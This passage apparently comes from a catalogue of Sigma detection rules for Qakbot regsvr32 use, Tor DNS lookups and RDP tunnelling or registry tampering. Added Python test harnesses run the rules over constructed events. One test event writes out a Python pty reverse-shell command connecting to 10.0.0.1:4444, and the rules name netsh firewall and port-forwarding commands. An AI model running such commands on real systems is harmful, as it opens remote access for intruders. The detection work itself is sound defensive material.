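            "[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"sh\")'"
        ),
    },
    # Uses the socket module but neither pty nor spawn: must not fire.
    "benign_hostname": {
        "Image": "/usr/bin/python3",
        "CommandLine": "python3 -c 'import socket; print(socket.gethostname())'",
    },
    # Same behaviour via socket.create_connection(): the command line never
    # contains the literal '.connect', so the rule misses it.
    "create_connection_variant": {
        "Image": "/usr/bin/python3",
        "CommandLine": (
            "python3 -c 'import os,pty,socket;"
            's=socket.create_connection(("10.0.0.1",4444));'
            "[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"sh\")'"
        ),
    },
}

WINDOWS_EVENTS = {
    "import_pty_spawn": {
        "Image": "C:\\Python311\\python.exe",
        "CommandLine": "python.exe -c \"import pty; pty.spawn('cmd.exe')\"",
    },
    "from_pty_import_spawn": {
        "Image": "C:\\Python311\\python3.exe",
        "CommandLine": "python3.exe -c \"from pty import spawn; spawn('cmd.exe')\"",
    },
    # The rule deliberately omits the leading backslash so ipython.exe is
    # also covered; without a pty spawn it still does not fire.
    "ipython_benign": {
        "Image": "C:\\Python311\\Scripts\\ipython.exe",
        "CommandLine": "ipython.exe notebook.py",
    },
}


def evaluate(rule, events):
    """Return {event name: True if the rule fires}."""
    return {name: rule(ev) for name, ev in events.items()}


if __name__ == "__main__":
    for rule, events in (
        (linux_python_pty_revshell, LINUX_EVENTS),
        (windows_python_pty_spawn, WINDOWS_EVENTS),
    ):
        for name, hit in evaluate(rule, events).items():
            print(f"{rule.__name__:26} {name:26} {'ALERT' if hit else 'no match'}")
```

Running it prints one ALERT per rule for the constructed shells and "no match" for the benign line, the ipython process and the `create_connection` variant. That last miss is the point to remember when tuning: the rule keys on the method name, not on the behaviour, so a sibling rule (or a loosened list) is needed if that variant matters in your environment.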
high Moderate High FP
Qakbot Regsvr32 Calc Pattern
Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 0033cf83-fb87-446d-9cac-43d63ad4d5a9
view Sigma YAML
title: Qakbot Regsvr32 Calc Pattern
id: 0033cf83-fb87-446d-9cac-43d63ad4d5a9
status: test
description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
references:
    - https://github.com/pr0xylife/Qakbot/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-26
modified: 2024-03-05
tags:
    - attack.execution
    - detection.emerging-threats
    - attack.stealth
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains|windash: ' -s'
        CommandLine|endswith: ' calc'
    condition: selection
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
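The rule above writes the silent flag once as `' -s'` and relies on the `windash` modifier to cover the `/s` form that the description actually talks about. The block below is an added example for this page, not SigmaHQ code: it expands `windash` by hand and evaluates the rule over constructed command lines. The `-` and `/` pair is the original purpose of the modifier; the en dash, em dash and horizontal bar follow the Sigma v2 modifier specification and are assumed here, so drop them if your backend is older.

```python
"""Sigma 0033cf83 (Qakbot Regsvr32 Calc Pattern) as a plain Python predicate,
expanding the |windash modifier by hand. Added example for this page; not
SigmaHQ code."""


# windash replaces '-' in the rule value with every dash form Windows
# programs accept as a flag prefix. '-' and '/' are the original pair; the
# en dash, em dash and horizontal bar follow the Sigma v2 modifier
# specification and are assumed here.
WINDASH_FORMS = ["-", "/", "\u2013", "\u2014", "\u2015"]


def windash_variants(value):
    """All strings the backend will match for a |windash value."""
    return {value.replace("-", form) for form in WINDASH_FORMS}


def qakbot_regsvr32_calc(event):
    """Image|endswith '\\regsvr32.exe', ' -s' (windash), CommandLine|endswith ' calc'."""
    image = str(event.get("Image", "")).lower()
    cmd = str(event.get("CommandLine", "")).lower()
    has_silent_flag = any(v in cmd for v in windash_variants(" -s"))
    return image.endswith("\\regsvr32.exe") and has_silent_flag and cmd.endswith(" calc")


# Constructed sample events; the Qakbot-style lines mimic the pattern the
# rule describes and are not copied from a real sample.
REGSVR32 = "C:\\Windows\\System32\\regsvr32.exe"
EVENTS = {
    "qakbot_slash_s": {
        "Image": REGSVR32,
        "CommandLine": "regsvr32.exe /s C:\\ProgramData\\Tmp\\x.dll calc",
    },
    "qakbot_dash_s": {
        "Image": REGSVR32,
        "CommandLine": "regsvr32.exe -s C:\\ProgramData\\Tmp\\x.dll calc",
    },
    "qakbot_en_dash": {
        "Image": REGSVR32,
        "CommandLine": "regsvr32.exe \u2013s C:\\ProgramData\\Tmp\\x.dll calc",
    },
    # Ordinary silent registration: no trailing ' calc'.
    "silent_register_benign": {
        "Image": REGSVR32,
        "CommandLine": "regsvr32.exe /s \"C:\\Program Files\\App\\comctl.dll\"",
    },
    # 'calc' present but not as the final token.
    "calc_dll_not_trailing": {
        "Image": REGSVR32,
        "CommandLine": "regsvr32.exe /s calc.dll",
    },
    "wrong_image": {
        "Image": "C:\\Windows\\System32\\rundll32.exe",
        "CommandLine": "rundll32.exe /s x.dll calc",
    },
}


def evaluate(events=EVENTS):
    return {name: qakbot_regsvr32_calc(ev) for name, ev in events.items()}


if __name__ == "__main__":
    for name, hit in evaluate().items():
        print(f"{name:24} {'ALERT' if hit else 'no match'}")
```

Three of the six constructed lines fire: the `/s`, `-s` and en dash forms. If a converted query in your SIEM only fires on `/s`, the backend did not honour `windash` and you are missing the other prefixes.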
high Moderate High FP
Qakbot Uninstaller Execution
Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
status test author Florian Roth (Nextron Systems) ATT&CK tactic-only id bc309b7a-3c29-4937-a4a3-e232473f9168
view Sigma YAML
title: Qakbot Uninstaller Execution
id: bc309b7a-3c29-4937-a4a3-e232473f9168
status: test
description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
references:
    - https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources
    - https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community
    - https://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community
author: Florian Roth (Nextron Systems)
date: 2023-08-31
modified: 2023-09-01
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\QbotUninstall.exe'
        - Hashes|contains:
              - 'IMPHASH=E772C815072311D6FB8C3390743E6BE5'
              - 'SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180'
              - 'SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6'
              - 'SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071'
              - 'SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0'
    condition: selection
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high Moderate Medium FP
Query Tor Onion Address - DNS Client
Detects DNS resolution of an .onion address related to Tor routing networks
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id 8384bd26-bde6-4da9-8e5d-4174a7a47ca2
view Sigma YAML
title: Query Tor Onion Address - DNS Client
id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2
related:
    - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544
      type: similar
    - id: a8322756-015c-42e7-afb1-436e85ed3ff5
      type: similar
status: test
description: Detects DNS resolution of an .onion address related to Tor routing networks
references:
    - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-02-20
modified: 2025-09-12
tags:
    - attack.command-and-control
    - attack.t1090.003
logsource:
    product: windows
    service: dns-client
    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'
detection:
    selection:
        EventID: 3008
        QueryName|endswith:
            - '.hiddenservice.net'
            - '.onion.ca'
            - '.onion.cab'
            - '.onion.casa'
            - '.onion.city'
            - '.onion.direct'
            - '.onion.dog'
            - '.onion.glass'
            - '.onion.gq'
            - '.onion.guide'
            - '.onion.in.net'
            - '.onion.ink'
            - '.onion.it'
            - '.onion.link'
            - '.onion.lt'
            - '.onion.lu'
            - '.onion.ly'
            - '.onion.mn'
            - '.onion.network'
            - '.onion.nu'
            - '.onion.pet'
            - '.onion.plus'
            - '.onion.pt'
            - '.onion.pw'
            - '.onion.rip'
            - '.onion.sh'
            - '.onion.si'
            - '.onion.to'
            - '.onion.top'
            - '.onion.ws'
            - '.onion'
            - '.s1.tor-gateways.de'
            - '.s2.tor-gateways.de'
            - '.s3.tor-gateways.de'
            - '.s4.tor-gateways.de'
            - '.s5.tor-gateways.de'
            - '.t2w.pw'
            - '.tor2web.ae.org'
            - '.tor2web.blutmagie.de'
            - '.tor2web.com'
            - '.tor2web.fi'
            - '.tor2web.io'
            - '.tor2web.org'
            - '.tor2web.xyz'
            - '.torlink.co'
    condition: selection
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high Strong High FP
RDP Connection Allowed Via Netsh.EXE
Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
status test author Sander Wiebing ATT&CK sub-technique id 01aeb693-138d-49d2-9403-c4f52d7d3d62
view Sigma YAML
title: RDP Connection Allowed Via Netsh.EXE
id: 01aeb693-138d-49d2-9403-c4f52d7d3d62
status: test
description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
references:
    - https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/
author: Sander Wiebing
date: 2020-05-23
modified: 2023-12-11
tags:
    - attack.defense-impairment
    - attack.t1686.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\netsh.exe'
        - OriginalFileName: 'netsh.exe'
    selection_cli:
        # Example:
        #   Old: netsh firewall add portopening TCP 3389 "Open Port 3389"
        #   New: netsh advfirewall firewall add rule name= "Open Port 3389" dir=in action=allow protocol=TCP localport=3389
        CommandLine|contains|all:
            - 'firewall '
            - 'add '
            - 'tcp '
            - '3389'
        CommandLine|contains:
            - 'portopening'
            - 'allow'
    condition: all of selection_*
falsepositives:
    - Legitimate administration activity
level: high
Convert to SIEM query
high Moderate Low FP
RDP Login from Localhost
RDP login with localhost source address may be a tunnelled login
status test author Thomas Patzke ATT&CK sub-technique id 51e33403-2a37-4d66-a574-1fda1782cc31
view Sigma YAML
title: RDP Login from Localhost
id: 51e33403-2a37-4d66-a574-1fda1782cc31
status: test
description: RDP login with localhost source address may be a tunnelled login
references:
    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
author: Thomas Patzke
date: 2019-01-28
modified: 2022-10-09
tags:
    - attack.lateral-movement
    - car.2013-07-002
    - attack.t1021.001
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4624
        LogonType: 10
        IpAddress:
            - '::1'
            - '127.0.0.1'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate Medium FP
RDP Over Reverse SSH Tunnel
Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
status test author Samir Bousseaden ATT&CK sub-technique id 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4
view Sigma YAML
title: RDP Over Reverse SSH Tunnel
id: 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4
status: test
description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
references:
    - https://twitter.com/cyb3rops/status/1096842275437625346
author: Samir Bousseaden
date: 2019-02-16
modified: 2024-03-12
tags:
    - attack.command-and-control
    - attack.t1572
    - attack.lateral-movement
    - attack.t1021.001
    - car.2013-07-002
logsource:
    category: network_connection
    product: windows
detection:
    selection_img:
        Image|endswith: '\svchost.exe'
        Initiated: 'true'
        SourcePort: 3389
    selection_destination:
        DestinationIp|cidr:
            - '127.0.0.0/8'
            - '::1/128'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Strong High FP
RDP Port Forwarding Rule Added Via Netsh.EXE
Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
status test author Florian Roth (Nextron Systems), oscd.community ATT&CK technique id 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63
view Sigma YAML
title: RDP Port Forwarding Rule Added Via Netsh.EXE
id: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63
status: test
description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
references:
    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
author: Florian Roth (Nextron Systems), oscd.community
date: 2019-01-29
modified: 2023-02-13
tags:
    - attack.lateral-movement
    - attack.command-and-control
    - attack.t1090
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\netsh.exe'
        - OriginalFileName: 'netsh.exe'
    selection_cli:
        CommandLine|contains|all:
            - ' i'
            - ' p'
            - '=3389'
            - ' c'
    condition: all of selection_*
falsepositives:
    - Legitimate administration activity
level: high
Convert to SIEM query
high Strong Medium FP
RDP Sensitive Settings Changed
Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
Below is a list of registry keys/values that are monitored by this rule:
- Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.
- DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.
- DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.
- fAllowUnsolicited: Allows unsolicited remote assistance offers.
- fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.
- InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.
- ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.
- SecurityLayer: Specifies the security layer used for RDP connections.
status test author Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali ATT&CK technique id 3f6b7b62-61aa-45db-96bd-9c31b36b653c
view Sigma YAML
title: RDP Sensitive Settings Changed
id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c
related:
    - id: 171b67e1-74b4-460e-8d55-b331f3e32d67
      type: obsolete
    - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3
      type: obsolete
    - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b
      type: similar
status: test
description: |
    Detects tampering of RDP Terminal Service/Server sensitive settings.
    Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.

    Below is a list of registry keys/values that are monitored by this rule:

    - Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.
    - DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.
    - DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.
    - fAllowUnsolicited: Allows unsolicited remote assistance offers.
    - fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.
    - InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.
    - ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.
    - SecurityLayer: Specifies the security layer used for RDP connections.
references:
    - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contains description for most of the keys mentioned here (check it out if you want more information)
    - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique
    - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contains description for most of the keys mentioned here (check it out if you want more information)
    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
    - https://blog.sekoia.io/darkgate-internals/
    - https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/
    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry
    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry
    - https://github.com/redcanaryco/atomic-red-team/blob/dd526047b8c399c312fee47d1e6fb531164da54d/atomics/T1112/T1112.yaml#L790
    - https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-rdp-winstationextensions-securitylayer
    - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html
    - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique
    - https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the "ServiceDll" key
    - https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html
author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
date: 2022-08-06
modified: 2025-11-22
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: registry_set
    product: windows
detection:
    selection_shadow:
        TargetObject|contains:
            - '\Control\Terminal Server\'
            - '\Windows NT\Terminal Services\'
        TargetObject|endswith: '\Shadow'
        Details:
            - 'DWORD (0x00000001)' # Full Control with user’s permission
            - 'DWORD (0x00000002)' # Full Control without user’s permission
            - 'DWORD (0x00000003)' # View Session with user’s permission
            - 'DWORD (0x00000004)' # View Session without user’s permission
    selection_terminal_services_key:
        TargetObject|contains:
            - '\Control\Terminal Server\'
            - '\Windows NT\Terminal Services\'
        TargetObject|endswith:
            - '\DisableRemoteDesktopAntiAlias' # Disable anti-aliasing for remote desktop (DarkGate malware)
            - '\DisableSecuritySettings' # Disable security settings, allowing access to programs/entire desktop (DarkGate malware)
            - '\fAllowUnsolicited' # Allow unsolicited remote assistance offers
            - '\fAllowUnsolicitedFullControl'
        Details: 'DWORD (0x00000001)'
    selection_tamper_only:
        # Any changes to these keys should be suspicious and looked at
        TargetObject|contains:
            - '\Control\Terminal Server\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
            - '\Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
            - '\services\TermService\Parameters\ServiceDll' # RDP hijacking
            - '\Terminal Server\WinStations\RDP-Tcp\SecurityLayer'
            - '\Windows NT\Terminal Services\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
    filter_main_securitylayer_tls:
        TargetObject|endswith: '\SecurityLayer'
        Details: 'DWORD (0x00000002)' # TLS Enabled
    condition: (selection_shadow or selection_terminal_services_key or selection_tamper_only) and not 1 of filter_main_*
falsepositives:
    - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
level: high
Convert to SIEM query
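This rule combines three selections with a filter, and the interaction is easy to misread: any write to `SecurityLayer` is a hit from `selection_tamper_only`, but the `filter_main_securitylayer_tls` clause then suppresses the one value (2, TLS) that is hardening rather than tampering. The block below is an added example for this page, not SigmaHQ code: it implements the rule as plain Python and runs it over constructed Sysmon Event ID 13 (registry_set) events, using the `DWORD (0x........)` rendering Sysmon puts in the `Details` field. One constructed event writes `fDenyTSConnections`, which the description mentions but no selection covers, to make that gap visible.

```python
"""Sigma 3f6b7b62 (RDP Sensitive Settings Changed) as plain Python, run over
constructed Sysmon Event ID 13 (registry_set) events. Added example for this
page; not SigmaHQ code."""


def _s(value):
    # Sigma strings match case-insensitively.
    return str(value or "").lower()


def _contains_any(value, needles):
    haystack = _s(value)
    return any(_s(n) in haystack for n in needles)


def _endswith_any(value, suffixes):
    haystack = _s(value)
    return any(haystack.endswith(_s(x)) for x in suffixes)


TS_KEY_PATHS = ["\\Control\\Terminal Server\\", "\\Windows NT\\Terminal Services\\"]
# Sysmon renders REG_DWORD data as 'DWORD (0x........)' in the Details field.
SHADOW_MODES = ["DWORD (0x00000001)", "DWORD (0x00000002)",
                "DWORD (0x00000003)", "DWORD (0x00000004)"]
ENABLE_VALUES = ["\\DisableRemoteDesktopAntiAlias", "\\DisableSecuritySettings",
                 "\\fAllowUnsolicited", "\\fAllowUnsolicitedFullControl"]
TAMPER_ONLY_PATHS = [
    "\\Control\\Terminal Server\\InitialProgram",
    "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram",
    "\\services\\TermService\\Parameters\\ServiceDll",
    "\\Terminal Server\\WinStations\\RDP-Tcp\\SecurityLayer",
    "\\Windows NT\\Terminal Services\\InitialProgram",
]


def selection_shadow(e):
    return (_contains_any(e["TargetObject"], TS_KEY_PATHS)
            and _s(e["TargetObject"]).endswith("\\shadow")
            and _s(e["Details"]) in {_s(m) for m in SHADOW_MODES})


def selection_terminal_services_key(e):
    return (_contains_any(e["TargetObject"], TS_KEY_PATHS)
            and _endswith_any(e["TargetObject"], ENABLE_VALUES)
            and _s(e["Details"]) == _s("DWORD (0x00000001)"))


def selection_tamper_only(e):
    # Any write to these values is interesting, whatever the data.
    return _contains_any(e["TargetObject"], TAMPER_ONLY_PATHS)


def filter_main_securitylayer_tls(e):
    # SecurityLayer = 2 selects TLS; that is hardening, not tampering.
    return (_s(e["TargetObject"]).endswith("\\securitylayer")
            and _s(e["Details"]) == _s("DWORD (0x00000002)"))


def rdp_sensitive_settings_changed(e):
    """(shadow or terminal_services_key or tamper_only) and not 1 of filter_main_*"""
    hit = (selection_shadow(e) or selection_terminal_services_key(e)
           or selection_tamper_only(e))
    return hit and not filter_main_securitylayer_tls(e)


# Constructed events; key paths follow the real registry layout.
CTL_TS = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server"
POL_TS = "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services"
EVENTS = {
    "shadow_full_control_silent": {"TargetObject": POL_TS + "\\Shadow", "Details": "DWORD (0x00000002)"},
    "shadow_disabled": {"TargetObject": POL_TS + "\\Shadow", "Details": "DWORD (0x00000000)"},
    "disable_security_settings": {"TargetObject": CTL_TS + "\\DisableSecuritySettings", "Details": "DWORD (0x00000001)"},
    "securitylayer_rdp_only": {"TargetObject": CTL_TS + "\\WinStations\\RDP-Tcp\\SecurityLayer", "Details": "DWORD (0x00000000)"},
    "securitylayer_tls": {"TargetObject": CTL_TS + "\\WinStations\\RDP-Tcp\\SecurityLayer", "Details": "DWORD (0x00000002)"},
    "termservice_servicedll": {"TargetObject": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters\\ServiceDll", "Details": "C:\\Users\\Public\\termsrv.dll"},
    # Mentioned in the description, but no selection covers it.
    "fdenytsconnections_enable_rdp": {"TargetObject": CTL_TS + "\\fDenyTSConnections", "Details": "DWORD (0x00000000)"},
}


def evaluate(events=EVENTS):
    return {name: rdp_sensitive_settings_changed(ev) for name, ev in events.items()}


if __name__ == "__main__":
    for name, hit in evaluate().items():
        print(f"{name:32} {'ALERT' if hit else 'no match'}")
```

Setting `SecurityLayer` to 0 (RDP security layer) fires, setting it to 2 does not, and a `ServiceDll` write fires regardless of the data. If your registry telemetry does not render DWORDs the way Sysmon does, the `Details` comparisons in `selection_shadow` and `selection_terminal_services_key` are the first thing to map.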
high Strong Medium FP
RDP over Reverse SSH Tunnel WFP
Detects svchost hosting RDP termsvcs communicating with the loopback address
status test author Samir Bousseaden ATT&CK sub-technique id 5bed80b6-b3e8-428e-a3ae-d3c757589e41
view Sigma YAML
title: RDP over Reverse SSH Tunnel WFP
id: 5bed80b6-b3e8-428e-a3ae-d3c757589e41
status: test
description: Detects svchost hosting RDP termsvcs communicating with the loopback address
references:
    - https://twitter.com/SBousseaden/status/1096148422984384514
    - https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx
author: Samir Bousseaden
date: 2019-02-16
modified: 2022-09-02
tags:
    - attack.command-and-control
    - attack.lateral-movement
    - attack.t1090.001
    - attack.t1090.002
    - attack.t1021.001
    - car.2013-07-002
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 5156
    sourceRDP:
        SourcePort: 3389
        DestAddress:
            - '127.*'
            - '::1'
    destinationRDP:
        DestPort: 3389
        SourceAddress:
            - '127.*'
            - '::1'
    filter_app_container:
        FilterOrigin: 'AppContainer Loopback'
    filter_thor:  # checking BlueKeep vulnerability
        Application|endswith:
            - '\thor.exe'
            - '\thor64.exe'
    condition: selection and ( sourceRDP or destinationRDP ) and not 1 of filter*
falsepositives:
    - Programs that connect locally to the RDP port
level: high
Convert to SIEM query
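The two rules above look for the same thing, svchost talking RDP over loopback, from two log sources: 5f699bc5 on Sysmon network_connection events with a `|cidr` match, and 5bed80b6 on Security Event ID 5156 with `127.*` wildcards and two exclusion filters. The block below is an added example for this page, not SigmaHQ code: it implements both as plain Python, using `ipaddress` for the CIDR modifier and `fnmatch` for the wildcard, and runs them over constructed events whose field names follow each rule (`DestinationIp`/`Initiated` on the Sysmon side, `SourceAddress`/`DestAddress`/`DestPort` on the 5156 side, where ports arrive as strings).

```python
"""Sigma 5f699bc5 (Sysmon network_connection, |cidr) and 5bed80b6 (Security
5156, wildcards plus filters) as plain Python, run over constructed events.
Added example for this page; not SigmaHQ code."""
import fnmatch
import ipaddress


def _s(value):
    return str(value or "").lower()


LOOPBACK = [ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("::1/128")]


def in_cidr(ip_text, networks):
    """|cidr modifier: a value that is not a valid address never matches."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in networks)


def rdp_over_reverse_ssh_tunnel(e):
    """5f699bc5: svchost, outbound, source port 3389, loopback destination."""
    return (_s(e.get("Image")).endswith("\\svchost.exe")
            and _s(e.get("Initiated")) == "true"
            and int(e.get("SourcePort", 0)) == 3389
            and in_cidr(e.get("DestinationIp"), LOOPBACK))


def _matches_any(value, patterns):
    """Sigma wildcard values ('127.*'): '*' is any run of characters."""
    return any(fnmatch.fnmatchcase(_s(value), _s(p)) for p in patterns)


def rdp_over_reverse_ssh_tunnel_wfp(e):
    """5bed80b6: selection and (sourceRDP or destinationRDP) and not 1 of filter*."""
    if int(e.get("EventID", 0)) != 5156:
        return False
    source_rdp = (int(e.get("SourcePort", 0)) == 3389
                  and _matches_any(e.get("DestAddress"), ["127.*", "::1"]))
    destination_rdp = (int(e.get("DestPort", 0)) == 3389
                       and _matches_any(e.get("SourceAddress"), ["127.*", "::1"]))
    filter_app_container = _s(e.get("FilterOrigin")) == "appcontainer loopback"
    filter_thor = _s(e.get("Application")).endswith(("\\thor.exe", "\\thor64.exe"))
    return (source_rdp or destination_rdp) and not (filter_app_container or filter_thor)


SVCHOST = "C:\\Windows\\System32\\svchost.exe"
# Constructed Sysmon Event ID 3 events (fields as Sigma names them).
SYSMON_EVENTS = {
    "tunnel_ipv4": {"Image": SVCHOST, "Initiated": "true", "SourcePort": 3389, "DestinationIp": "127.0.0.1"},
    "tunnel_ipv6": {"Image": SVCHOST, "Initiated": "true", "SourcePort": 3389, "DestinationIp": "::1"},
    "ordinary_rdp_session": {"Image": SVCHOST, "Initiated": "true", "SourcePort": 3389, "DestinationIp": "10.20.30.40"},
    "inbound_not_initiated": {"Image": SVCHOST, "Initiated": "false", "SourcePort": 3389, "DestinationIp": "127.0.0.1"},
}
# Constructed Security Event ID 5156 events; ports arrive as strings.
WFP_SVCHOST = "\\device\\harddiskvolume2\\windows\\system32\\svchost.exe"
WFP_EVENTS = {
    "tunnel_to_local_rdp": {"EventID": "5156", "SourceAddress": "127.0.0.1", "SourcePort": "52100",
                            "DestAddress": "127.0.0.1", "DestPort": "3389", "Application": WFP_SVCHOST},
    "appcontainer_loopback": {"EventID": "5156", "SourceAddress": "127.0.0.1", "SourcePort": "52101",
                              "DestAddress": "127.0.0.1", "DestPort": "3389", "Application": WFP_SVCHOST,
                              "FilterOrigin": "AppContainer Loopback"},
    "thor_bluekeep_check": {"EventID": "5156", "SourceAddress": "127.0.0.1", "SourcePort": "52102",
                            "DestAddress": "127.0.0.1", "DestPort": "3389",
                            "Application": "\\device\\harddiskvolume2\\tools\\thor64.exe"},
    "remote_rdp_client": {"EventID": "5156", "SourceAddress": "10.20.30.40", "SourcePort": "50000",
                          "DestAddress": "10.20.30.5", "DestPort": "3389", "Application": WFP_SVCHOST},
}


def evaluate():
    """Return (sysmon results, wfp results) as {event name: fired}."""
    return ({n: rdp_over_reverse_ssh_tunnel(e) for n, e in SYSMON_EVENTS.items()},
            {n: rdp_over_reverse_ssh_tunnel_wfp(e) for n, e in WFP_EVENTS.items()})


if __name__ == "__main__":
    for results in evaluate():
        for name, hit in results.items():
            print(f"{name:24} {'ALERT' if hit else 'no match'}")
```

Both implementations alert on the loopback tunnel and stay quiet on a remote client; the 5156 version additionally drops AppContainer loopback traffic and the THOR scanner's local port check. Note that `fnmatch` treats `?` and `[` as metacharacters too, which is harmless for these two patterns but worth remembering if you reuse `_matches_any` for other Sigma wildcard values.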
high Moderate Medium FP
RDP to HTTP or HTTPS Target Ports
